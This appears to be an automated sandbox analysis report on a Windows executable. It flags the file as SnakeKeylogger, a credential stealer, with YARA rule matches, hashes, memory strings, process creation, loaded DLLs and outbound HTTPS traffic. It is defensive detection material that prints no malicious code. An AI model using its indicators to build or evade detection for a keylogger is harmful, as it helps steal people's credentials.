                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49790 version: TLS 1.2

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.kP8EgMorTr.exe.3896ef8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.kP8EgMorTr.exe.3896ef8.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.kP8EgMorTr.exe.3896ef8.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 3.2.kP8EgMorTr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.kP8EgMorTr.exe.3729970.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 3.2.kP8EgMorTr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 3.2.kP8EgMorTr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.kP8EgMorTr.exe.3729970.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.kP8EgMorTr.exe.3729970.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.kP8EgMorTr.exe.3896ef8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.kP8EgMorTr.exe.3896ef8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: kP8EgMorTr.exe PID: 7276, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: kP8EgMorTr.exe PID: 7432, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 0_2_009F5CC40_2_009F5CC4
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 0_2_009FE1240_2_009FE124
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 0_2_009F70930_2_009F7093
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 0_2_04BF86640_2_04BF8664
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 0_2_04BF88180_2_04BF8818
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 0_2_04BFF00F0_2_04BFF00F
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 0_2_04BFF1000_2_04BFF100
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 0_2_04BF88090_2_04BF8809
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 0_2_06D0B6880_2_06D0B688
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 0_2_06D0E7700_2_06D0E770
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 0_2_06D00CF80_2_06D00CF8
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 0_2_06D051FC0_2_06D051FC
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 0_2_06D06EE80_2_06D06EE8
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 0_2_06D0B6780_2_06D0B678
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 0_2_06D0AF910_2_06D0AF91
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 0_2_06D0AFA00_2_06D0AFA0
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 0_2_06D0E7600_2_06D0E760
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 0_2_06D0DBC00_2_06D0DBC0
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 0_2_06D051F50_2_06D051F5
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_031C53623_2_031C5362
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_031CD2CB3_2_031CD2CB
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_031C71183_2_031C7118
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_031CC1473_2_031CC147
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_031CA0883_2_031CA088
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_031CC7383_2_031CC738
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_031CD5993_2_031CD599
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_031CC4683_2_031CC468
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_031CCA083_2_031CCA08
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_031C69A03_2_031C69A0
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_031CCFF83_2_031CCFF8
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_031C3E093_2_031C3E09
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_031CEC183_2_031CEC18
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_031CF7F13_2_031CF7F1
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_031C3AB13_2_031C3AB1
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_031C29EC3_2_031C29EC
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_031CEC0B3_2_031CEC0B
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_031CFC4F3_2_031CFC4F
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E997B03_2_05E997B0
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E99ED83_2_05E99ED8
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E952903_2_05E95290
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E98DF93_2_05E98DF9
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E995903_2_05E99590
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E9ED703_2_05E9ED70
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E9E4C03_2_05E9E4C0
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E9E4BB3_2_05E9E4BB
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E9DC013_2_05E9DC01
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E9DC103_2_05E9DC10
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E9D7B83_2_05E9D7B8
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E9CF083_2_05E9CF08
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E99E713_2_05E99E71
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E9F6203_2_05E9F620
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E98E083_2_05E98E08
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E9F6103_2_05E9F610
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E9F1C83_2_05E9F1C8
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E9F1C33_2_05E9F1C3
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E929703_2_05E92970
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E9E9083_2_05E9E908
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E9E9183_2_05E9E918
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E9E0683_2_05E9E068
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E900403_2_05E90040
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E9E0593_2_05E9E059
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E9003F3_2_05E9003F
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E91BA83_2_05E91BA8
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E91B973_2_05E91B97
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E9D3603_2_05E9D360
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E90B203_2_05E90B20
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E90B303_2_05E90B30
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E922883_2_05E92288
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E952803_2_05E95280
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E9FA6A3_2_05E9FA6A
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E9FA783_2_05E9FA78
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 3_2_05E922783_2_05E92278
                    Source: kP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs kP8EgMorTr.exe
                    Source: kP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs kP8EgMorTr.exe
                    Source: kP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs kP8EgMorTr.exe
                    Source: kP8EgMorTr.exe, 00000000.00000002.1248774151.000000000276F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs kP8EgMorTr.exe
                    Source: kP8EgMorTr.exe, 00000000.00000002.1246312545.0000000000A6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs kP8EgMorTr.exe
                    Source: kP8EgMorTr.exe, 00000000.00000002.1254420339.00000000052D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs kP8EgMorTr.exe
                    Source: kP8EgMorTr.exe, 00000000.00000000.1234820976.0000000000262000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameGpGI.exeD vs kP8EgMorTr.exe
                    Source: kP8EgMorTr.exe, 00000000.00000002.1255991907.0000000006D10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs kP8EgMorTr.exe
                    Source: kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs kP8EgMorTr.exe
                    Source: kP8EgMorTr.exe, 00000003.00000002.3698209610.00000000011A7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs kP8EgMorTr.exe
                    Source: kP8EgMorTr.exeBinary or memory string: OriginalFilenameGpGI.exeD vs kP8EgMorTr.exe
                    Source: kP8EgMorTr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.kP8EgMorTr.exe.3896ef8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.kP8EgMorTr.exe.3896ef8.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.kP8EgMorTr.exe.3896ef8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 3.2.kP8EgMorTr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.kP8EgMorTr.exe.3729970.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 3.2.kP8EgMorTr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 3.2.kP8EgMorTr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.kP8EgMorTr.exe.3729970.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.kP8EgMorTr.exe.3729970.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.kP8EgMorTr.exe.3896ef8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.kP8EgMorTr.exe.3896ef8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: kP8EgMorTr.exe PID: 7276, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: kP8EgMorTr.exe PID: 7432, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: kP8EgMorTr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.kP8EgMorTr.exe.52d0000.3.raw.unpack, DlRvq5yJkomY4LIf3S.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.kP8EgMorTr.exe.3896ef8.0.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.kP8EgMorTr.exe.3896ef8.0.raw.unpack, -i.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.kP8EgMorTr.exe.3896ef8.0.raw.unpack, -i.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, -i.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, -i.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, rEpPJQV6URL37f8mXq.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, rEpPJQV6URL37f8mXq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, rEpPJQV6URL37f8mXq.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, rgGUGalHrgysDRf4jP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, rgGUGalHrgysDRf4jP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, rEpPJQV6URL37f8mXq.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, rEpPJQV6URL37f8mXq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, rEpPJQV6URL37f8mXq.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kP8EgMorTr.exe.logJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeMutant created: NULL
                    Source: kP8EgMorTr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: kP8EgMorTr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: kP8EgMorTr.exe, 00000003.00000002.3699670660.0000000003555000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.0000000003599000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.0000000003573000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.0000000003565000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000035A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: kP8EgMorTr.exeVirustotal: Detection: 36%
                    Source: kP8EgMorTr.exeReversingLabs: Detection: 39%
                    Source: unknownProcess created: C:\Users\user\Desktop\kP8EgMorTr.exe "C:\Users\user\Desktop\kP8EgMorTr.exe"
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess created: C:\Users\user\Desktop\kP8EgMorTr.exe "C:\Users\user\Desktop\kP8EgMorTr.exe"
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess created: C:\Users\user\Desktop\kP8EgMorTr.exe "C:\Users\user\Desktop\kP8EgMorTr.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: dhcpcsvc.dllJump to behavior
